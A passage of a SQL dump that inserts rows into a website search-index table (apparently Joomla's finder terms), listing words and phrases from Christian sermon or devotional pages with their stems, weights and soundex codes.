(115079, 'continue', 'continu', 0, 0, 0.5333, 'C535', 5, '*'),
(115094, 'didn\'t', 'didn', 0, 0, 0.4, 'D530', 8, '*'),
(115097, 'directions', 'direct', 0, 0, 0.6667, 'D62352', 3, '*'),
(115107, 'egypt', 'egypt', 0, 0, 0.3333, 'E213', 4, '*'),
(115121, 'experience', 'experi', 0, 0, 0.6667, 'E21652', 5, '*'),
(115124, 'experiences', 'experi', 0, 0, 0.7333, 'E21652', 5, '*'),
(115155, 'go down', 'go down', 0, 1, 1.2333, 'G350', 2, '*'),
(115161, 'grounds', 'ground', 0, 0, 0.4667, 'G6532', 2, '*'),
(115179, 'have not', 'have not', 0, 1, 1.2667, 'H153', 5, '*'),
(115184, 'heights', 'height', 0, 0, 0.4667, 'H232', 2, '*'),
(115197, 'i pray', 'i pray', 0, 1, 1.2, 'I160', 3, '*'),
(115213, 'is a house', 'is a house', 0, 1, 1.3333, 'I200', 3, '*'),
(115217, 'it and', 'it and', 0, 1, 1.2, 'I353', 5, '*'),
(115219, 'it be', 'it be', 0, 1, 1.1667, 'I310', 3, '*'),
(115232, 'it when', 'it when', 0, 1, 1.2333, 'I350', 2, '*'),
(115242, 'jordan', 'jordan', 0, 0, 0.4, 'J635', 3, '*'),
(115245, 'just a', 'just a', 0, 1, 1.2, 'J300', 5, '*'),
(115248, 'just let', 'just let', 0, 1, 1.2667, 'J343', 3, '*'),
(115261, 'laid', 'laid', 0, 0, 0.2667, 'L300', 2, '*'),
(115269, 'let it', 'let it', 0, 1, 1.2, 'L300', 3, '*'),
(115270, 'let it be', 'let it be', 0, 1, 1.3, 'L310', 3, '*'),
(115274, 'let them', 'let them', 0, 1, 1.2667, 'L350', 3, '*'),
(115279, 'life of', 'life of', 0, 1, 1.2333, 'L100', 5, '*'),
(115280, 'life of god', 'life of god', 0, 1, 1.3667, 'L123', 2, '*'),
(115281, 'life today', 'life today', 0, 1, 1.3333, 'L130', 3, '*'),
(115283, 'life what', 'life what', 0, 1, 1.3, 'L130', 3, '*'),
(115285, 'life with', 'life with', 0, 1, 1.3, 'L130', 3, '*'),
(115288, 'lifestyle', 'lifestyl', 0, 0, 0.6, 'L1234', 2, '*'),
(115306, 'may you be', 'mai you be', 0, 1, 1.3333, 'M100', 2, '*'),
(115320, 'move with', 'move with', 0, 1, 1.3, 'M130', 2, '*'),
(115330, 'moves', 'move', 0, 0, 0.3333, 'M120', 2, '*'),
(115356, 'new heights', 'new heights', 0, 1, 1.3667, 'N232', 2, '*'),
(115359, 'new realms', 'new realms', 0, 1, 1.3333, 'N6452', 2, '*'),
(115363, 'new things', 'new things', 0, 1, 1.3333, 'N352', 2, '*'),
(115373, 'not stop', 'not stop', 0, 1, 1.2667, 'N3231', 2, '*'),
(115382, 'of my', 'of my', 0, 1, 1.1667, 'O150', 3, '*'),
(115416, 'pray in', 'prai in', 0, 1, 1.2333, 'P650', 4, '*'),
(115418, 'pray that', 'prai that', 0, 1, 1.3, 'P630', 2, '*'),
(115422, 'proceed', 'proce', 0, 0, 0.4667, 'P623', 2, '*'),
(115430, 'prophecy', 'propheci', 0, 0, 0.5333, 'P612', 4, '*'),
(115445, 'prophet', 'prophet', 0, 0, 0.4667, 'P613', 4, '*'),
(115448, 'prophetic', 'prophet', 0, 0, 0.6, 'P6132', 3, '*'),
(115457, 'realms', 'realm', 0, 0, 0.4, 'R452', 3, '*'),
(115463, 'refer', 'refer', 0, 0, 0.3333, 'R160', 2, '*'),
(115464, 'refer to', 'refer to', 0, 1, 1.2667, 'R163', 2, '*'),
(115473, 'saith', 'saith', 0, 0, 0.3333, 'S300', 2, '*'),
(115474, 'saith the', 'saith the', 0, 1, 1.3, 'S300', 2, '*'),
(115475, 'saith the lord', 'saith the lord', 0, 1, 1.4667, 'S3463', 2, '*'),
(115504, 'spirit don\'t', 'spirit don', 0, 1, 1.4, 'S16353', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(115505, 'spirit don\'t let', 'spirit don let', 0, 1, 1.5333, 'S1635343', 2, '*'),
(115519, 'the foundation', 'the foundation', 0, 1, 1.4667, 'T1535', 2, '*'),
(115525, 'the life of', 'the life of', 0, 1, 1.3667, 'T410', 5, '*'),
(115535, 'the prophetic', 'the prophetic', 0, 1, 1.4333, 'T16132', 2, '*'),
(115539, 'the time', 'the time', 0, 1, 1.2667, 'T500', 7, '*'),
(115550, 'them when', 'them when', 0, 1, 1.3, 'T500', 4, '*'),
(115551, 'them when you', 'them when you', 0, 1, 1.4333, 'T500', 2, '*'),
(115556, 'they didn\'t', 'thei didn', 0, 1, 1.3667, 'T530', 2, '*'),
(115572, 'those words', 'those words', 0, 1, 1.3667, 'T2632', 3, '*'),
(115581, 'to us and', 'to us and', 0, 1, 1.3, 'T253', 2, '*'),
(115593, 'upward and', 'upward and', 0, 1, 1.3333, 'U16353', 2, '*'),
(115594, 'upward and forward', 'upward and forward', 0, 1, 1.6, 'U16353163', 2, '*'),
(115598, 'visitation', 'visit', 0, 0, 0.6667, 'V235', 2, '*'),
(115625, 'will move', 'will move', 0, 1, 1.3, 'W451', 3, '*'),
(115629, 'will see', 'will see', 0, 1, 1.2667, 'W420', 4, '*'),
(115631, 'with it', 'with it', 0, 1, 1.2333, 'W300', 4, '*'),
(115652, 'you have not', 'you have not', 0, 1, 1.4, 'Y153', 2, '*'),
(115653, 'you move with', 'you move with', 0, 1, 1.4333, 'Y513', 2, '*'),
(115658, 'you speak', 'you speak', 0, 1, 1.3, 'Y212', 3, '*'),
(115662, 'you will see', 'you will see', 0, 1, 1.4, 'Y420', 3, '*'),
(115670, 'your life today', 'your life today', 0, 1, 1.5, 'Y6413', 3, '*'),
(115671, 'your life what', 'your life what', 0, 1, 1.4667, 'Y6413', 3, '*'),
(115672, 'your life with', 'your life with', 0, 1, 1.4667, 'Y6413', 3, '*'),
(115679, 'your prophecy', 'your prophecy', 0, 1, 1.4333, 'Y61612', 3, '*'),
(115687, '“is', '“i', 0, 0, 0.2, '“200', 2, '*'),
(116052, 'be your', 'be your', 0, 1, 1.2333, 'B600', 4, '*'),
(116069, 'but to', 'but to', 0, 1, 1.2, 'B300', 4, '*'),
(116071, 'but what', 'but what', 0, 1, 1.2667, 'B300', 2, '*'),
(116110, 'cost', 'cost', 0, 0, 0.2667, 'C300', 3, '*'),
(116157, 'different', 'differ', 0, 0, 0.6, 'D1653', 5, '*'),
(116158, 'different situations', 'differ situations', 0, 1, 1.6667, 'D16532352', 2, '*'),
(116321, 'if you have', 'if you have', 0, 1, 1.3667, 'I100', 3, '*'),
(116386, 'jesus that', 'jesu that', 0, 1, 1.3333, 'J300', 2, '*'),
(116408, 'light and', 'light and', 0, 1, 1.3, 'L2353', 2, '*'),
(116502, 'opportunity', 'opportun', 0, 0, 0.7333, 'O16353', 5, '*'),
(116503, 'opportunity to', 'opportun to', 0, 1, 1.4667, 'O16353', 2, '*'),
(116581, 'situations', 'situat', 0, 0, 0.6667, 'S352', 4, '*'),
(116597, 'sounds', 'sound', 0, 0, 0.4, 'S532', 2, '*'),
(117070, 'a true', 'a true', 0, 1, 1.2, 'A360', 3, '*'),
(117071, 'a true christian', 'a true christian', 0, 1, 1.5333, 'A3626235', 2, '*'),
(117081, 'above scripture', 'abov scripture', 0, 1, 1.5, 'A126136', 2, '*'),
(117104, 'all you', 'all you', 0, 1, 1.2333, 'A400', 3, '*'),
(117106, 'all you need', 'all you need', 0, 1, 1.4, 'A453', 2, '*'),
(117238, 'at what', 'at what', 0, 1, 1.2333, 'A300', 4, '*'),
(117262, 'be found', 'be found', 0, 1, 1.2667, 'B530', 5, '*'),
(117263, 'be found in', 'be found in', 0, 1, 1.3667, 'B535', 2, '*'),
(117414, 'dealt', 'dealt', 0, 0, 0.3333, 'D430', 2, '*'),
(117457, 'do is to', 'do is to', 0, 1, 1.2667, 'D230', 3, '*'),
(117629, 'glory to', 'glori to', 0, 1, 1.2667, 'G463', 1, '*'),
(117673, 'hates', 'hate', 0, 0, 0.3333, 'H320', 3, '*'),
(117688, 'hear', 'hear', 0, 0, 0.2667, 'H600', 9, '*'),
(117760, 'in the scriptures', 'in the scriptures', 0, 1, 1.5667, 'I53261362', 2, '*'),
(117761, 'in the world', 'in the world', 0, 1, 1.4, 'I53643', 3, '*'),
(117768, 'instead', 'instead', 0, 0, 0.4667, 'I523', 3, '*'),
(117875, 'leads', 'lead', 0, 0, 0.3333, 'L320', 5, '*'),
(117920, 'look at what', 'look at what', 0, 1, 1.4, 'L230', 4, '*'),
(118062, 'of work', 'of work', 0, 1, 1.2333, 'O162', 2, '*'),
(118173, 'primary', 'primari', 0, 0, 0.4667, 'P656', 3, '*'),
(118188, 'proverbs 23', 'proverb 23', 0, 1, 1.3667, 'P61612', 2, '*'),
(118204, 'really', 'realli', 0, 0, 0.4, 'R400', 4, '*'),
(118216, 'represent', 'repres', 0, 0, 0.6, 'R16253', 3, '*'),
(118217, 'represent god\'s', 'repres god', 0, 1, 1.5, 'R16253232', 2, '*'),
(118218, 'represent god\'s glory', 'repres god glory', 0, 1, 1.7, 'R1625323246', 2, '*'),
(118243, 'said in the', 'said in the', 0, 1, 1.3667, 'S353', 2, '*'),
(118257, 'scriptures', 'scriptur', 0, 0, 0.6667, 'S61362', 7, '*'),
(118756, 'you are to', 'you are to', 0, 1, 1.3333, 'Y630', 2, '*'),
(118819, 'your mind', 'your mind', 0, 1, 1.3, 'Y653', 7, '*'),
(145813, 'deal', 'deal', 0, 0, 0.2667, 'D400', 2, '*'),
(145846, 'do you know', 'do you know', 0, 1, 1.3667, 'D250', 3, '*'),
(145896, 'faith but', 'faith but', 0, 1, 1.3, 'F313', 2, '*'),
(145924, 'fear', 'fear', 0, 0, 0.2667, 'F600', 8, '*'),
(146223, 'satan if', 'satan if', 0, 1, 1.2667, 'S351', 2, '*'),
(146387, 'there was', 'there was', 0, 1, 1.3, 'T620', 4, '*'),
(146558, 'you is', 'you is', 0, 1, 1.2, 'Y200', 3, '*'),
(146565, 'you take the', 'you take the', 0, 1, 1.4, 'Y323', 2, '*'),
(146733, 'a little', 'a little', 0, 1, 1.2667, 'A434', 2, '*'),
(146742, 'a pastor', 'a pastor', 0, 1, 1.2667, 'A1236', 2, '*'),
(146771, 'active', 'activ', 0, 0, 0.4, 'A231', 4, '*'),
(146774, 'actively', 'activ', 0, 0, 0.5333, 'A2314', 4, '*'),
(146788, 'all your', 'all your', 0, 1, 1.2667, 'A460', 6, '*'),
(146810, 'and all you', 'and all you', 0, 1, 1.3667, 'A534', 2, '*'),
(146811, 'and can', 'and can', 0, 1, 1.2333, 'A5325', 2, '*'),
(146832, 'and now', 'and now', 0, 1, 1.2333, 'A535', 3, '*'),
(146853, 'and those', 'and those', 0, 1, 1.3, 'A532', 4, '*'),
(146877, 'are in', 'ar in', 0, 1, 1.2, 'A650', 3, '*'),
(146881, 'are many', 'ar many', 0, 1, 1.2667, 'A650', 2, '*'),
(146883, 'are those', 'ar those', 0, 1, 1.3, 'A632', 3, '*'),
(146888, 'arm', 'arm', 0, 0, 0.2, 'A650', 2, '*'),
(146892, 'around you or', 'around you or', 0, 1, 1.4333, 'A6536', 2, '*'),
(146907, 'ask yourself', 'ask yourself', 0, 1, 1.4, 'A26241', 5, '*'),
(146913, 'at how', 'at how', 0, 1, 1.2, 'A300', 2, '*'),
(146919, 'at your', 'at your', 0, 1, 1.2333, 'A360', 4, '*'),
(146932, 'be a man', 'be a man', 0, 1, 1.2667, 'B500', 2, '*'),
(146945, 'become a pastor', 'becom a pastor', 0, 1, 1.5, 'B251236', 2, '*'),
(146970, 'but those', 'but those', 0, 1, 1.3, 'B320', 2, '*'),
(146976, 'by his', 'by his', 0, 1, 1.2, 'B200', 3, '*'),
(146980, 'by praying', 'by praying', 0, 1, 1.3333, 'B652', 2, '*'),
(146984, 'called us', 'call us', 0, 1, 1.3, 'C432', 2, '*'),
(146986, 'called you', 'call you', 0, 1, 1.3333, 'C430', 4, '*'),
(146990, 'can do', 'can do', 0, 1, 1.2, 'C530', 5, '*'),
(147081, 'creating', 'creat', 0, 0, 0.5333, 'C6352', 2, '*'),
(147084, 'daily', 'daili', 0, 0, 0.3333, 'D400', 10, '*'),
(147089, 'day when', 'dai when', 0, 1, 1.2667, 'D500', 2, '*'),
(147120, 'direction and', 'direct and', 0, 1, 1.4333, 'D62353', 2, '*'),
(147126, 'divine instruction', 'divin instruction', 0, 1, 1.6, 'D15236235', 3, '*'),
(147133, 'do that', 'do that', 0, 1, 1.2333, 'D000', 3, '*'),
(147146, 'don\'t even', 'don even', 0, 1, 1.3333, 'D5315', 3, '*'),
(147175, 'earth you', 'earth you', 0, 1, 1.3, 'E630', 2, '*'),
(147176, 'earth you must', 'earth you must', 0, 1, 1.4667, 'E63523', 2, '*'),
(147187, 'embrace', 'embrac', 0, 0, 0.4667, 'E5162', 5, '*'),
(147188, 'embrace it', 'embrac it', 0, 1, 1.3333, 'E51623', 3, '*'),
(147192, 'end up', 'end up', 0, 1, 1.2, 'E531', 2, '*'),
(147225, 'face of', 'face of', 0, 1, 1.2333, 'F210', 3, '*'),
(147246, 'family', 'famili', 0, 0, 0.4, 'F540', 12, '*'),
(147251, 'fashion', 'fashion', 0, 0, 0.4667, 'F250', 3, '*'),
(147300, 'given the', 'given the', 0, 1, 1.3, 'G153', 2, '*'),
(147306, 'go through', 'go through', 0, 1, 1.3333, 'G362', 3, '*'),
(147307, 'go through all', 'go through all', 0, 1, 1.4667, 'G3624', 2, '*'),
(147313, 'god has called', 'god has called', 0, 1, 1.4667, 'G3243', 3, '*'),
(147317, 'god\'s word', 'god word', 0, 1, 1.3333, 'G3263', 7, '*'),
(147324, 'gospel of', 'gospel of', 0, 1, 1.3, 'G141', 2, '*'),
(147330, 'great men', 'great men', 0, 1, 1.3, 'G635', 2, '*'),
(147343, 'has called', 'ha called', 0, 1, 1.3333, 'H243', 4, '*'),
(147345, 'has called you', 'ha called you', 0, 1, 1.4667, 'H243', 3, '*'),
(147362, 'heard', 'heard', 0, 0, 0.3333, 'H630', 4, '*'),
(147366, 'hearts', 'heart', 0, 0, 0.4, 'H632', 2, '*'),
(147369, 'hebrews', 'hebrew', 0, 0, 0.4667, 'H162', 3, '*'),
(147372, 'hell', 'hell', 0, 0, 0.2667, 'H400', 2, '*'),
(147378, 'him but', 'him but', 0, 1, 1.2333, 'H513', 3, '*'),
(147386, 'his life', 'hi life', 0, 1, 1.2667, 'H241', 5, '*'),
(147390, 'his soul', 'hi soul', 0, 1, 1.2667, 'H240', 2, '*'),
(147403, 'important for', 'import for', 0, 1, 1.4333, 'I51635316', 2, '*'),
(147411, 'in every', 'in every', 0, 1, 1.2667, 'I516', 3, '*'),
(147417, 'in him', 'in him', 0, 1, 1.2, 'I500', 4, '*'),
(147421, 'in leadership', 'in leadership', 0, 1, 1.4333, 'I543621', 2, '*'),
(147428, 'in that', 'in that', 0, 1, 1.2333, 'I530', 4, '*'),
(147432, 'in those', 'in those', 0, 1, 1.2667, 'I532', 3, '*'),
(147439, 'instruction', 'instruct', 0, 0, 0.7333, 'I5236235', 4, '*'),
(147464, 'is because', 'is because', 0, 1, 1.3333, 'I212', 5, '*'),
(147470, 'is how', 'is how', 0, 1, 1.2, 'I200', 4, '*'),
(147480, 'is the primary', 'is the primary', 0, 1, 1.4667, 'I231656', 2, '*'),
(147485, 'is your responsibility', 'is your responsibility', 0, 1, 1.7333, 'I262152143', 3, '*'),
(147489, 'it seems', 'it seems', 0, 1, 1.2667, 'I3252', 3, '*'),
(147531, 'leadership', 'leadership', 0, 0, 0.6667, 'L3621', 3, '*'),
(147548, 'less', 'less', 0, 0, 0.2667, 'L200', 4, '*'),
(147553, 'let me ask', 'let me ask', 0, 1, 1.3333, 'L352', 2, '*'),
(147555, 'lie', 'lie', 0, 0, 0.2, 'L000', 4, '*'),
(147568, 'like an', 'like an', 0, 1, 1.2333, 'L250', 2, '*'),
(147578, 'live by', 'live by', 0, 1, 1.2333, 'L100', 6, '*'),
(147586, 'look at how', 'look at how', 0, 1, 1.3667, 'L230', 2, '*'),
(147592, 'lot of people', 'lot of people', 0, 1, 1.4333, 'L314', 2, '*'),
(147593, 'loved', 'love', 0, 0, 0.3333, 'L130', 3, '*'),
(147607, 'matter what', 'matter what', 0, 1, 1.3667, 'M363', 4, '*'),
(147612, 'me ask', 'me ask', 0, 1, 1.2, 'M200', 2, '*'),
(147613, 'me ask you', 'me ask you', 0, 1, 1.3333, 'M200', 2, '*'),
(147637, 'more you', 'more you', 0, 1, 1.2667, 'M600', 4, '*'),
(147647, 'must actively', 'must actively', 0, 1, 1.4333, 'M232314', 2, '*'),
(147660, 'nation', 'nation', 0, 0, 0.4, 'N350', 4, '*'),
(147683, 'no matter what', 'no matter what', 0, 1, 1.4667, 'N363', 4, '*'),
(147705, 'now have', 'now have', 0, 1, 1.2667, 'N100', 2, '*'),
(147718, 'of people', 'of people', 0, 1, 1.3, 'O140', 4, '*'),
(147722, 'of the devil', 'of the devil', 0, 1, 1.4, 'O1314', 4, '*'),
(147723, 'of the earth', 'of the earth', 0, 1, 1.4, 'O1363', 2, '*'),
(147726, 'of time', 'of time', 0, 1, 1.2333, 'O135', 2, '*'),
(147797, 'play', 'plai', 0, 0, 0.2667, 'P400', 3, '*'),
(147845, 'process', 'process', 0, 0, 0.4667, 'P620', 3, '*'),
(147859, 'reach', 'reach', 0, 0, 0.3333, 'R200', 4, '*'),
(147860, 'reach out', 'reach out', 0, 1, 1.3, 'R230', 2, '*'),
(147863, 'reading', 'read', 0, 0, 0.4667, 'R352', 2, '*'),
(147875, 'remember', 'rememb', 0, 0, 0.5333, 'R516', 10, '*'),
(147876, 'remember that', 'rememb that', 0, 1, 1.4333, 'R5163', 4, '*'),
(147877, 'remember that there', 'rememb that there', 0, 1, 1.6333, 'R51636', 2, '*'),
(147880, 'responsibility', 'respons', 0, 0, 0.9333, 'R2152143', 4, '*'),
(147881, 'responsibility to', 'respons to', 0, 1, 1.5667, 'R2152143', 3, '*'),
(147923, 'seems', 'seem', 0, 0, 0.3333, 'S520', 5, '*'),
(147933, 'serious and', 'seriou and', 0, 1, 1.3667, 'S6253', 2, '*'),
(147969, 'somewhere', 'somewher', 0, 0, 0.6, 'S560', 7, '*'),
(147972, 'soul which', 'soul which', 0, 1, 1.3333, 'S420', 2, '*'),
(148018, 'stronger your', 'stronger your', 0, 1, 1.4333, 'S36526', 2, '*'),
(148020, 'structure', 'structur', 0, 0, 0.6, 'S36236', 4, '*'),
(148021, 'structure in', 'structur in', 0, 1, 1.4, 'S362365', 3, '*'),
(148040, 'taking', 'take', 0, 0, 0.4, 'T252', 3, '*'),
(148069, 'the earth you', 'the earth you', 0, 1, 1.4333, 'T630', 2, '*'),
(148070, 'the face', 'the face', 0, 1, 1.2667, 'T120', 3, '*'),
(148071, 'the face of', 'the face of', 0, 1, 1.3667, 'T121', 3, '*'),
(148076, 'the gospel of', 'the gospel of', 0, 1, 1.4333, 'T2141', 2, '*'),
(148077, 'the just', 'the just', 0, 1, 1.2667, 'T230', 4, '*'),
(148087, 'the more you', 'the more you', 0, 1, 1.4, 'T560', 3, '*'),
(148092, 'the primary', 'the primary', 0, 1, 1.3667, 'T1656', 2, '*'),
(148100, 'the stronger', 'the stronger', 0, 1, 1.4, 'T236526', 2, '*'),
(148101, 'the stronger your', 'the stronger your', 0, 1, 1.5667, 'T236526', 2, '*'),
(148106, 'the title', 'the title', 0, 1, 1.3, 'T400', 2, '*'),
(148108, 'the truth', 'the truth', 0, 1, 1.3, 'T630', 3, '*'),
(148122, 'themselves on', 'themselv on', 0, 1, 1.4333, 'T524125', 2, '*'),
(148123, 'themselves on the', 'themselv on the', 0, 1, 1.5667, 'T5241253', 2, '*'),
(148127, 'there are many', 'there are many', 0, 1, 1.4667, 'T650', 2, '*'),
(148137, 'they find', 'thei find', 0, 1, 1.3, 'T153', 5, '*'),
(148164, 'through all', 'through all', 0, 1, 1.3667, 'T624', 2, '*'),
(148166, 'through his', 'through his', 0, 1, 1.3667, 'T620', 4, '*'),
(148186, 'to develop your', 'to develop your', 0, 1, 1.5, 'T1416', 2, '*'),
(148193, 'to function', 'to function', 0, 1, 1.3667, 'T15235', 3, '*'),
(148196, 'to go', 'to go', 0, 1, 1.1667, 'T200', 5, '*'),
(148197, 'to go through', 'to go through', 0, 1, 1.4333, 'T2362', 2, '*'),
(148198, 'to help', 'to help', 0, 1, 1.2333, 'T410', 3, '*'),
(148202, 'to lead', 'to lead', 0, 1, 1.2333, 'T430', 4, '*'),
(148205, 'to learn', 'to learn', 0, 1, 1.2667, 'T465', 4, '*'),
(148209, 'to our', 'to our', 0, 1, 1.2, 'T600', 3, '*'),
(148211, 'to play', 'to play', 0, 1, 1.2333, 'T140', 3, '*'),
(148214, 'to pray for', 'to pray for', 0, 1, 1.3667, 'T1616', 4, '*'),
(148263, 'up is', 'up is', 0, 1, 1.1667, 'U120', 2, '*'),
(148268, 'upright', 'upright', 0, 0, 0.4667, 'U1623', 2, '*'),
(148277, 'us as', 'us as', 0, 1, 1.1667, 'U200', 3, '*'),
(148283, 'use the', 'us the', 0, 1, 1.2333, 'U230', 2, '*'),
(148285, 'very serious', 'veri serious', 0, 1, 1.4, 'V6262', 3, '*'),
(148308, 'was given', 'wa given', 0, 1, 1.3, 'W215', 2, '*'),
(148310, 'way to get', 'wai to get', 0, 1, 1.3333, 'W323', 3, '*'),
(148329, 'week we', 'week we', 0, 1, 1.2333, 'W200', 2, '*'),
(148395, 'worst', 'worst', 0, 0, 0.3333, 'W623', 2, '*'),
(148398, 'would be', 'would be', 0, 1, 1.2667, 'W431', 3, '*'),
(148413, 'you do is', 'you do is', 0, 1, 1.3, 'Y320', 2, '*'),
(148424, 'you must actively', 'you must actively', 0, 1, 1.5667, 'Y5232314', 2, '*'),
(148429, 'you or', 'you or', 0, 1, 1.2, 'Y600', 5, '*'),
(148435, 'you this', 'you this', 0, 1, 1.2667, 'Y320', 2, '*'),
(148439, 'you\'ll never', 'you never', 0, 1, 1.4, 'Y4516', 2, '*'),
(148452, 'your daily', 'your daily', 0, 1, 1.3333, 'Y634', 6, '*'),
(148456, 'your divine', 'your divine', 0, 1, 1.3667, 'Y6315', 2, '*'),
(148466, 'your life and', 'your life and', 0, 1, 1.4333, 'Y64153', 10, '*'),
(148474, 'your responsibility', 'your responsibility', 0, 1, 1.6333, 'Y62152143', 3, '*'),
(148475, 'your responsibility to', 'your responsibility to', 0, 1, 1.7333, 'Y62152143', 3, '*'),
(148480, 'yourself and', 'yourself and', 0, 1, 1.4, 'Y624153', 3, '*'),
(148484, 'yourself on the', 'yourself on the', 0, 1, 1.5, 'Y624153', 2, '*'),
(148895, 'and repent', 'and repent', 0, 1, 1.3333, 'A536153', 2, '*'),
(148896, 'and repent of', 'and repent of', 0, 1, 1.4333, 'A5361531', 2, '*'),
(149052, 'best way', 'best way', 0, 1, 1.2667, 'B230', 3, '*'),
(149053, 'best way to', 'best way to', 0, 1, 1.3667, 'B230', 3, '*'),
(149059, 'both', 'both', 0, 0, 0.2667, 'B300', 5, '*'),
(149174, 'complain', 'complain', 0, 0, 0.5333, 'C5145', 3, '*'),
(149198, 'consistently', 'consist', 0, 0, 0.8, 'C523534', 4, '*'),
(149333, 'experiences you', 'experi you', 0, 1, 1.5, 'E21652', 2, '*'),
(149390, 'from their', 'from their', 0, 1, 1.3333, 'F6536', 3, '*'),
(149507, 'has told', 'ha told', 0, 1, 1.2667, 'H2343', 3, '*'),
(149508, 'has told us', 'ha told us', 0, 1, 1.3667, 'H23432', 3, '*'),
(149515, 'have had', 'have had', 0, 1, 1.2667, 'H130', 3, '*'),
(149535, 'hear the', 'hear the', 0, 1, 1.2667, 'H630', 3, '*'),
(149587, 'how much', 'how much', 0, 1, 1.2667, 'H520', 3, '*'),
(149597, 'i want you', 'i want you', 0, 1, 1.3333, 'I530', 4, '*'),
(149773, 'life to', 'life to', 0, 1, 1.2333, 'L130', 7, '*'),
(149853, 'man his', 'man his', 0, 1, 1.2333, 'M200', 3, '*'),
(149888, 'master', 'master', 0, 0, 0.4, 'M236', 4, '*'),
(149912, 'missed', 'miss', 0, 0, 0.4, 'M230', 5, '*'),
(149913, 'missed the', 'miss the', 0, 1, 1.3333, 'M230', 2, '*'),
(149924, 'more than', 'more than', 0, 1, 1.3, 'M635', 3, '*'),
(149952, 'naked', 'nake', 0, 0, 0.3333, 'N230', 2, '*'),
(150042, 'of their', 'of their', 0, 1, 1.2667, 'O136', 7, '*'),
(150113, 'people who', 'peopl who', 0, 1, 1.3333, 'P400', 6, '*'),
(150162, 'pride', 'pride', 0, 0, 0.3333, 'P630', 2, '*'),
(150245, 'repent', 'repent', 0, 0, 0.4, 'R153', 5, '*'),
(150246, 'repent of', 'repent of', 0, 1, 1.3, 'R1531', 2, '*'),
(150437, 'talking', 'talk', 0, 0, 0.4667, 'T4252', 2, '*'),
(150444, 'tell you', 'tell you', 0, 1, 1.2667, 'T400', 5, '*'),
(150470, 'that gives', 'that gives', 0, 1, 1.3333, 'T212', 2, '*'),
(150507, 'the best way', 'the best way', 0, 1, 1.4, 'T123', 3, '*'),
(150719, 'to become', 'to become', 0, 1, 1.3, 'T125', 6, '*'),
(150721, 'to begin', 'to begin', 0, 1, 1.2667, 'T125', 2, '*'),
(150722, 'to begin to', 'to begin to', 0, 1, 1.3667, 'T1253', 2, '*'),
(150738, 'to draw', 'to draw', 0, 1, 1.2333, 'T600', 2, '*'),
(150748, 'to hear', 'to hear', 0, 1, 1.2333, 'T600', 2, '*'),
(150749, 'to hear the', 'to hear the', 0, 1, 1.3667, 'T630', 2, '*'),
(150782, 'to tell', 'to tell', 0, 1, 1.2333, 'T400', 5, '*'),
(150803, 'told', 'told', 0, 0, 0.2667, 'T430', 12, '*'),
(150804, 'told us', 'told us', 0, 1, 1.2333, 'T432', 3, '*'),
(150820, 'true', 'true', 0, 0, 0.2667, 'T600', 5, '*'),
(150826, 'two very', 'two very', 0, 1, 1.2667, 'T160', 2, '*'),
(150828, 'unbroken', 'unbroken', 0, 0, 0.5333, 'U51625', 3, '*'),
(150863, 'walk with god', 'walk with god', 0, 1, 1.4333, 'W42323', 4, '*'),
(150864, 'want you', 'want you', 0, 1, 1.2667, 'W530', 7, '*'),
(150865, 'want you to', 'want you to', 0, 1, 1.3667, 'W530', 6, '*'),
(150866, 'wants our', 'want our', 0, 1, 1.3, 'W5326', 2, '*'),
(150867, 'wants our christianity', 'want our christianity', 0, 1, 1.7333, 'W5326262353', 2, '*'),
(150868, 'wants your', 'want your', 0, 1, 1.3333, 'W5326', 2, '*'),
(150869, 'wants your christianity', 'want your christianity', 0, 1, 1.7667, 'W5326262353', 2, '*'),
(150870, 'was complaining', 'wa complaining', 0, 1, 1.5, 'W251452', 2, '*'),
(150871, 'was complaining to', 'wa complaining to', 0, 1, 1.6, 'W2514523', 2, '*'),
(150872, 'was confused', 'wa confused', 0, 1, 1.4, 'W25123', 2, '*'),
(150873, 'was confused about', 'wa confused about', 0, 1, 1.6, 'W2512313', 2, '*'),
(150874, 'was doing', 'wa doing', 0, 1, 1.3, 'W2352', 3, '*'),
(150875, 'was doing although', 'wa doing although', 0, 1, 1.6, 'W2352432', 2, '*'),
(150876, 'was listening', 'wa listening', 0, 1, 1.4333, 'W242352', 2, '*'),
(150877, 'was listening to', 'wa listening to', 0, 1, 1.5333, 'W2423523', 2, '*'),
(150878, 'was to', 'wa to', 0, 1, 1.2, 'W230', 3, '*'),
(150879, 'was to create', 'wa to create', 0, 1, 1.4333, 'W23263', 2, '*'),
(150880, 'wasn\'t', 'wasn', 0, 0, 0.4, 'W253', 3, '*'),
(150881, 'wasn\'t helping', 'wasn helping', 0, 1, 1.4667, 'W2534152', 2, '*'),
(150882, 'wasn\'t helping her', 'wasn helping her', 0, 1, 1.6, 'W25341526', 2, '*'),
(150883, 'watch your', 'watch your', 0, 1, 1.3333, 'W326', 3, '*'),
(150884, 'watch your words', 'watch your words', 0, 1, 1.5333, 'W32632', 2, '*'),
(150885, 'way although', 'wai although', 0, 1, 1.4, 'W432', 2, '*'),
(150886, 'way although they', 'wai although they', 0, 1, 1.5667, 'W4323', 2, '*'),
(150887, 'way as', 'wai as', 0, 1, 1.2, 'W200', 2, '*'),
(150888, 'way as important', 'wai as important', 0, 1, 1.5333, 'W2516353', 2, '*'),
(150889, 'way but', 'wai but', 0, 1, 1.2333, 'W130', 2, '*'),
(150890, 'way but they', 'wai but they', 0, 1, 1.4, 'W130', 2, '*'),
(150891, 'way god', 'wai god', 0, 1, 1.2333, 'W230', 2, '*'),
(150892, 'way god approves', 'wai god approves', 0, 1, 1.5333, 'W231612', 2, '*'),
(150893, 'way he\'ll', 'wai he', 0, 1, 1.3, 'W400', 2, '*'),
(150894, 'way he\'ll bring', 'wai he bring', 0, 1, 1.5, 'W41652', 2, '*'),
(150895, 'way to keep', 'wai to keep', 0, 1, 1.3667, 'W321', 2, '*'),
(150896, 'way you', 'wai you', 0, 1, 1.2333, 'W000', 5, '*'),
(150897, 'way you live', 'wai you live', 0, 1, 1.4, 'W410', 2, '*'),
(150898, 'ways that unless', 'wai that unless', 0, 1, 1.5333, 'W23542', 2, '*'),
(150899, 'we are to', 'we are to', 0, 1, 1.3, 'W630', 3, '*'),
(150900, 'we go', 'we go', 0, 1, 1.1667, 'W200', 3, '*'),
(150901, 'we go too', 'we go too', 0, 1, 1.3, 'W230', 2, '*'),
(150902, 'we looked', 'we looked', 0, 1, 1.3, 'W423', 2, '*'),
(150903, 'we looked at', 'we looked at', 0, 1, 1.4, 'W423', 2, '*'),
